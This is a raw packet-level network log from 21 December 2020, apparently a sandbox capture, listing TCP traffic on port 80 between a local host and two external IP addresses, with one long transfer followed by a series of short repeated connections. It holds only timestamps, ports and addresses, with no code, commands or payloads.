Dec 21, 2020 08:33:22.076689959 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:22.076793909 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:22.076837063 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:22.076872110 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:22.076873064 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:22.076910973 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:22.076942921 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:22.076946974 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:22.076993942 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:22.077003956 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:22.077037096 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:22.077055931 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:22.077076912 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:22.077116966 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:22.077147961 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:22.077153921 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:22.077188969 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:22.077207088 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:22.077219009 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:22.077248096 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:22.077277899 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:22.077305079 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:22.077374935 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:22.077428102 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:22.077471972 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:22.077490091 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:22.077517986 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:22.077553034 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:22.077555895 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:22.077601910 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:22.077603102 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:22.077642918 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:22.077656031 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:22.077678919 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:22.077713966 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:22.077717066 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:22.077754974 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:22.077769041 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:22.077790976 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:22.077826977 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:22.077827930 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:22.077863932 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:22.077883959 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:22.077909946 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:22.077931881 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:22.077951908 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:22.077987909 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:22.077989101 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:22.078026056 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:22.078068018 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:22.078079939 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:22.078115940 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:22.078139067 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:22.078164101 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:22.078191996 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:22.078221083 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:22.078248024 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:22.078248978 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:22.078305006 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:22.078310013 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:22.078366041 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:22.078368902 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:22.078428030 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:22.078429937 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:22.078485012 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:22.078493118 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:22.078538895 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:22.078547001 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:22.078588963 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:22.078604937 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:22.078629017 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:22.078656912 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:22.078665972 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:22.078691959 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:22.078702927 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:22.078731060 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:22.078748941 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:22.078768969 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:22.078790903 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:22.078818083 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:22.078826904 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:22.078845024 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:22.078865051 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:22.078898907 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:22.078936100 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:22.078942060 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:22.078999043 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:22.079000950 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:22.079073906 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:22.079082012 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:22.079133034 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:22.079138994 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:22.079189062 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:22.079194069 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:22.079248905 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:22.079251051 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:22.079293013 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:22.079312086 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:22.079349041 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:22.079350948 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:22.079405069 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:22.079408884 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:22.079458952 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:22.079466105 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:22.079514980 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:22.079516888 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:22.079581022 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:22.080426931 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:22.080497980 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:22.080781937 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:22.080852032 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:22.080965996 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:22.081032038 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:22.081134081 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:22.081176996 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:22.081192017 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:22.081212997 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:22.081233025 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:22.081258059 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:22.081269979 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:22.081300020 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:22.081316948 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:22.081336975 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:22.081356049 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:22.081373930 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:22.081393003 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:22.081435919 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:22.081475019 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:22.081541061 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:22.081584930 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:22.081890106 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:22.081940889 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:22.081948996 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:22.081999063 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:22.082005024 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:22.082039118 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:22.082068920 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:22.082076073 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:22.082103014 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:22.082115889 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:22.082137108 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:22.082150936 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:22.082175016 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:22.082197905 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:22.082210064 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:22.082215071 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:22.082236052 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:22.082247972 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:22.082254887 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:22.082272053 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:22.082288980 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:22.082300901 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:22.082305908 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:22.082323074 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:22.082340002 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:22.082350969 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:22.082356930 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:22.082377911 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:22.082396030 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:22.082402945 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:22.082412958 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:22.082429886 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:22.082438946 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:22.082447052 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:22.082467079 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:22.082484961 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:22.082489967 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:22.082501888 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:22.082523108 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:22.082535982 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:22.082541943 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:22.082566023 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:22.082578897 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:22.082587957 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:22.082613945 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:22.082628012 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:22.082637072 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:22.082662106 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:22.082672119 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:22.082686901 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:22.082710981 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:22.082715034 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:22.082740068 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:22.082757950 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:22.082766056 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:22.082789898 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:22.082796097 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:22.082813978 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:22.082833052 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:22.082839966 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:22.082849979 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:22.082864046 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:22.082881927 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:22.082891941 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:22.082895994 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:22.082920074 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:22.082932949 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:22.082937956 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:22.082956076 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:22.082972050 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:22.082984924 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:22.082994938 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:22.083014965 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:22.083024979 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:22.083031893 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:22.083050966 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:22.083070040 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:22.083070040 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:22.083086967 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:22.083103895 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:22.083121061 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:22.083122969 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:22.083143950 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:22.083163023 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:22.083174944 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:22.083179951 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:22.083200932 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:22.083214998 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:22.083224058 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:22.083246946 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:22.083260059 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:22.083271027 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:22.083293915 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:22.083308935 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:22.083319902 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:22.083345890 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:22.083355904 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:22.083364010 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:22.083476067 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:22.099222898 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:22.624022007 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:32.276503086 CET	49168	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:32.337302923 CET	80	49168	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:32.338203907 CET	49168	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:32.340296984 CET	49168	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:32.400516033 CET	80	49168	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:32.400612116 CET	49168	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:32.460876942 CET	80	49168	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:32.529612064 CET	80	49168	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:32.529751062 CET	49168	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:32.529814005 CET	49168	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:32.590162992 CET	80	49168	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:33.030582905 CET	49169	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:33.095040083 CET	80	49169	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:33.095108986 CET	49169	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:33.097276926 CET	49169	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:33.160657883 CET	80	49169	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:33.160803080 CET	49169	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:33.223896980 CET	80	49169	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:33.289712906 CET	80	49169	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:33.289812088 CET	49169	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:33.289984941 CET	49169	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:33.353287935 CET	80	49169	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:33.418812037 CET	49170	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:33.477658033 CET	80	49170	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:33.477758884 CET	49170	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:33.482024908 CET	49170	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:33.540935993 CET	80	49170	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:33.541044950 CET	49170	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:33.599792004 CET	80	49170	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:33.668128967 CET	80	49170	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:33.668234110 CET	49170	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:33.668389082 CET	49170	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:33.727018118 CET	80	49170	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:33.914999962 CET	49171	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:33.976917028 CET	80	49171	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:33.977029085 CET	49171	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:33.982963085 CET	49171	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:34.044779062 CET	80	49171	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:34.044864893 CET	49171	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:34.106630087 CET	80	49171	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:34.172879934 CET	80	49171	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:34.172966003 CET	49171	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:34.173125982 CET	49171	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:34.234774113 CET	80	49171	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:34.398590088 CET	49172	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:34.464140892 CET	80	49172	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:34.464622974 CET	49172	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:34.470274925 CET	49172	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:34.535624027 CET	80	49172	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:34.535698891 CET	49172	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:34.601249933 CET	80	49172	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:34.668154001 CET	80	49172	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:34.668246984 CET	49172	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:34.668298006 CET	49172	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:34.733457088 CET	80	49172	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:34.914905071 CET	49173	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:34.973860025 CET	80	49173	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:34.975122929 CET	49173	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:34.978435993 CET	49173	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:35.037120104 CET	80	49173	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:35.037787914 CET	49173	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:35.096371889 CET	80	49173	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:35.166301012 CET	80	49173	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:35.166435003 CET	49173	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:35.166477919 CET	49173	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:35.225172997 CET	80	49173	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:35.394043922 CET	49174	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:35.452603102 CET	80	49174	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:35.452747107 CET	49174	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:35.458679914 CET	49174	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:35.517174959 CET	80	49174	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:35.517251968 CET	49174	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:35.575618982 CET	80	49174	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:35.642134905 CET	80	49174	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:35.642263889 CET	49174	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:35.642293930 CET	49174	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:35.700612068 CET	80	49174	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:35.874701977 CET	49175	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:35.932305098 CET	80	49175	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:35.932387114 CET	49175	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:35.934755087 CET	49175	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:35.992593050 CET	80	49175	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:35.992665052 CET	49175	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:36.050288916 CET	80	49175	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:36.116868019 CET	80	49175	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:36.116995096 CET	49175	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:36.117054939 CET	49175	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:36.174592972 CET	80	49175	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:36.348464966 CET	49176	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:36.412019014 CET	80	49176	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:36.412184000 CET	49176	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:36.417718887 CET	49176	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:36.481273890 CET	80	49176	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:36.481360912 CET	49176	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:36.544739962 CET	80	49176	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:36.615479946 CET	80	49176	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:36.615578890 CET	49176	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:36.615611076 CET	49176	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:36.679064989 CET	80	49176	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:36.843331099 CET	49177	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:36.902529955 CET	80	49177	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:36.902949095 CET	49177	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:36.908483028 CET	49177	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:36.968034983 CET	80	49177	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:36.968420982 CET	49177	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:37.027714014 CET	80	49177	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:37.104372025 CET	80	49177	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:37.104515076 CET	49177	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:37.104556084 CET	49177	80	192.168.2.22	185.193.143.118
